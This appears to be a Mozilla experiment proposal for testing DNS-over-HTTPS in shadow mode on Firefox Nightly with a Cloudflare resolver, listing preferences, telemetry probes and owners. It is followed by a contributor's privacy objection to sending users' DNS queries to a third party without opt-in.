Basic description of experiment: TRR is a separate and parallel way to resolve host names in the browser and the implementation allows for several different operational modes. We want to enable TRR in “shadow mode”, meaning that Firefox resolves all host names using both original native resolver mechanism as well as DNS-over-HTTPS (DOH) but the results from DOH are discarded and are only used for measuring and telemetry. For this experiment, we would use a cloudflare hosted server.

What is the preference we will be changing? network.trr.mode = 4, and network.trr.uri = “https://dns.cloudflare.com/.well-known/dns”

What are the branches of the study and what values should each branch be set to? Two branches: one using TRR, one not. (the one ‘not’ might actually be the control - it would have default prefs. Not sure of shield nomenclature.)

What percentage of users do you want in each branch? 50/50

What Channels and locales do you intend to ship to? Nightly

What is your intended go live date and how long will the study run? 7 days (?)
Are there specific criteria for participants? We want a random distribution to make it possible to assume both branches are sufficiently similar, user wise. Being able to break the data down by very rough locale would be interesting as internet topology will impact performance.

What is the main effect you are looking for and what data will you use to make these decisions? We will look at resolver timings, connection error rates and http response code changes.

Who is the owner of the data analysis for this study? Daniel Stenberg + Patrick McManus

Will this experiment require uplift? No

QA Status of your code: Green, yellow, red. Your code should be QA’d to ensure that changing the preference values has the intended effect you are looking for and does not cause obvious regressions to Firefox. All experiments must pass QA. Depending on the channel/population size a dev QA may be accepted.

Do you plan on surveying users at the end of the study? No.

Link to any relevant google docs / Drive files that describe the project. Links to prior art if it exists:



Details Section for Analysis
For each telemetry probe to be analysed in the study, find it here to determine the following:
Name of probes
DNS_LOOKUP_DISPOSITION
DNS_NATIVE_LOOKUP_TIME
DNS_TRR_RACE
DNS_LOOKUP_ALGORITHM
DNS_TRR_LOOKUP_TIME
DNS_BLACKLIST_COUNT
DNS_TRR_BLACKLISTED
DNS_CLEANUP_AGE
IPV4_AND_IPV6_ADDRESS_CONNECTIVITY
HTTP_RESPONSE_STATUS_CODE
Associated bugzilla thread URL:
e.g. https://bugzilla.mozilla.org/show_bug.cgi?id=

A contributor's rational response:

I think we shouldn't run this study in the proposed form. Sending information about what is browsed to an off-path party will erode trust in Mozilla due to people getting upset about privacy-sensitive information (what they browse where "they" is identified by IP address and "what" by host name) getting sent to an off-path party without explicit consent. The policy agreements we have in place with the off-path party won't remove this negative effect, since the way people are known to react this kind of thing isn't in our power to negotiate: people will react to this as a matter of what technically got sent and not as a matter of what the recipient promised not to do. (A browser sending information about what is browsed to an off-path party is the quintessential browser privacy no-no.) (By off-path party, I mean a party that isn't *by necessity* on the network path between the user's computer and the site the user browses. The site can use third-party trackers or infrastructure providers, but that's an action on the site's part--not on the browser's part.) The problem could be addressed in two ways: 1) To study things like end-to-end reachability or round-trip time, Firefox could perform queries for a set of pre-defined names (to remove any correlation with what the user actually browses). This kind of thing has successful precedent as part of TLS 1.3 handshake studies. 2) To study things under realistic use, we should obtain an explicit opt in specifically for sending DNS queries to Cloudflare. (We should do this even if it introduces a potential bias in the data.)